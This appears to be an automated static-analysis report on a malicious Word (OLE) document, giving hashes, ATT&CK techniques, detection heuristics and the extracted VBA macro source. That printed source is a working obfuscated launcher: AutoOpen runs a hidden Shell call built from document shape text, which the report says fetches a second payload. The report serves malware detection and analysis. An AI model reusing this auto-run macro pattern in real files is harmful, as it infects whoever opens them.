Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 70ae83ac7bccf878…

MALICIOUS

Office (OLE)

82.0 KB Created: 2018-11-15 16:38:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: cd21b16fc33873f940f528de4607ba1c SHA-1: c4246f68da2644704ecf1cf60bf999661f54f86b SHA-256: 70ae83ac7bccf878545d0d1b36b034dcf3a521fbf1a9f2cf3bcc0944762f8652
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.003 Windows Command Shell T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical OLE_VBA_SHELL firing indicating the use of the Shell() function, and a high severity SC_STR_CMD heuristic for cmd.exe invocation. The obfuscated command line arguments in the DOC BODY suggest an attempt to download and execute a secondary payload. The AutoOpen macro marker further supports the malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Generic-6750853-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6750853-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                "Jw", "Q", "Q", "k", "t", "D", "D", "zs")
Shell psrDZNnIIw + VNQwYidB + VGiAwwz, 0
   miMRbR = Array("vI", "Os", "pk", "d", "b", "i", "YY", "i", _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub AutoOpen()
   UGjnnCMiu = Array("Vz", "S", "p", "K", "lM", "ff", "n", "K", _
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4776 bytes
SHA-256: e6e03c31157c5bdb8ecacc6202c8d96d49744b1f861c6ccc6f9ac97d53957d03
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "OGIFuovkpfDDHo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function MHzVHE()
   DdKnC = Array("Ih", "Ul", "l", "mB", "QF", "S", "i", "LC", _
            "S", "J", "c", "O", "O", "H", "i", "kf", _
            "U", "s", "Ol", "A", "S", "jv", "bA", "pV", _
            "L", "T", "J", "p", "B", "T", "oS", "F", _
            "X", "a", "Ia", "Zo", "l", "Ov", "P", "E", _
            "m", "S", "wA", "jz", "v", "KV", "Qk", "dD", _
            "iz", "D", "q", "bL", "Z", "E", "n", "O", _
            "mJ", "lT", "rb", "X", "WU", "Bc", "Y", "mt")
   oGvWa = Array("c", "Iw", "hC", "mo", "u", "Nw", "zz", "j", _
            "Y", "co", "tE", "IT", "BT", "C", "zq", "aq", _
            "j", "G", "j", "p", "z", "q", "E", "j", _
            "v", "zr", "UT", "NN", "Sz", "L", "Q", "P", _
            "i", "M", "wA", "Q", "I", "BA", "uC", "zq", _
            "z", "J", "Q", "H", "Ih", "Bk", "b", "b", _
            "s", "wC", "ER", "SK", "J", "QM", "O", "O", _
            "dc", "fI", "Ou", "f", "X", "YG", "M", "hE")
psrDZNnIIw = "" + zdwAd + FIJhbQk + Shapes("bEitJZwA").TextFrame.ContainingRange + BqXbmzpi + zrUmK
   UGwNIHwNs = Array("SP", "oi", "D", "zn", "OI", "N", "D", "M", _
            "fw", "s", "P", "c", "k", "Ds", "mB", "ZJ", _
            "k", "Wj", "G", "nz", "E", "AQ", "U", "BW", _
            "L", "NN", "aV", "W", "I", "wz", "vb", "ZL", _
            "P", "Kj", "C", "dS", "u", "q", "J", "J", _
            "sk", "Q", "uZ", "AY", "s", "b", "B", "zD", _
            "sY", "uE", "O", "Fw", "XS", "ha", "wo", "G", _
            "B", "R", "t", "q", "EL", "c", "Uq", "Lj")
   AjXjM = Array("I", "j", "Oh", "u", "E", "S", "W", "Af", _
            "Xf", "mT", "p", "Pj", "H", "zw", "rr", "QQ", _
            "Fm", "zb", "wb", "A", "q", "j", "WA", "t", _
            "R", "h", "W", "W", "f", "HO", "h", "wp", _
            "z", "t", "LM", "r", "QI", "q", "Wr", "n", _
            "u", "XL", "wl", "mZ", "Fs", "iN", "fi", "U", _
            "iQ", "I", "v", "r", "I", "ru", "Zv", "r", _
            "TT", "I", "Q", "LU", "Mu", "jz", "GF", "l")
   jwJfOG = Array("m", "JO", "ol", "B", "hu", "D", "WE", "WI", _
            "O", "G", "Y", "OU", "Lr", "lm", "cc", "M", _
            "Ls", "a", "i", "p", "FD", "zq", "V", "N", _
            "L", "A", "O", "QP", "O", "bE", "S", "W", _
            "fs", "NY", "aI", "ju", "J", "O", "B", "L", _
            "F", "sT", "ai", "zi", "iB", "X", "d", "wI", _
            "Gr", "UB", "U", "B", "A", "z", "vz", "O", _
            "Jw", "Q", "Q", "k", "t", "D", "D", "zs")
Shell psrDZNnIIw + VNQwYidB + VGiAwwz, 0
   miMRbR = Array("vI", "Os", "pk", "d", "b", "i", "YY", "i", _
            "C", "lD", "DL", "j", "c", "kC", "O", "jo", _
            "Ao", "E", "w", "k", "Ko", "t", "q", "W", _
            "Tp", "bA", "B", "rz", "Zp", "Rz", "O", "ju", _
            "Cb", "Z", "Q", "fM", "rB", "w", "Z", "FD", _
            "FA", "Z", "w", "vs", "Tq", "Vm", "L", "hk", _
            "Ln", "hn", "S", "ma", "dL", "CX", "FZ", "s", _
            "kj", "O", "Mz", "N", "S", "tN", "r", "Zb")
End Function
Sub AutoOpen()
   UGjnnCMiu = Array("Vz", "S", "p", "K", "lM", "ff", "n", "K", _
            "ii", "PE", "kB", "Cl", "nh", "Yu", "l", "j", _
            "LT", "h", "aB", "A", "CB", "C", "hD", "Sn", _
            "I", "K", "w", "Gb", "TJ", "pS", "s", "j", _
            "A", "Bo", "m", "j", "NE", "js", "D", "M", _
            "v", "uq", "d", "Ea", "Mo", "JI", "zH", "l", _
            "iQ", "N", "a", "EZ", "H", "On", "Fl", "Kf", _
            "qw", "ZY", "aE", "w", "bW", "N", "cv", "S")
MHzVHE
   ctvouM = Array("B", "Bt", "a", "II", "q", "s", "w", "LY", _
            "dA", "Aw", "j", "uZ", "Up", "uf", "ai", "f", _
            "p", "D", "ld", "iC", "Pz", "SY", "DU", "w", _
            "j", "iB", "z", "ER", "KP", "L", "w", "n", _
            "j", "W", "Ep", "c", "A", "K", "hL", "k", _
            "d", "fw", "l", "F", "VH", "w", "jN", "n", _
            "i", "Lz", "m", "t", "R", "CF", "aq", "b", _
            "ql", "zF", "Vz", "n", "fR", "t", "s", "j")
   tnbSL = Array("M", "J", "U", "lC", "op", "p", "s", "G", _
            "jc", "C", "jX", "K", "sd", "t", "S", "G", _
            "B", "Ic", "R", "dO", "bO", "h", "lj", "Km", _
            "zz", "zK", "l", "mX", "m", "E", "Xz", "k", _
            "D", "i", "ZT", "DI", "VC", "f", "C", "iz", _
            "z", "bR", "c", "c", "N", "pZ", "Zp", "s", _
            "q", "h", "FB", "S", "Da", "VH", "GW", "RP", _
            "HT", "uz", "dj", "M", "pF", "v", "t", "P")
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.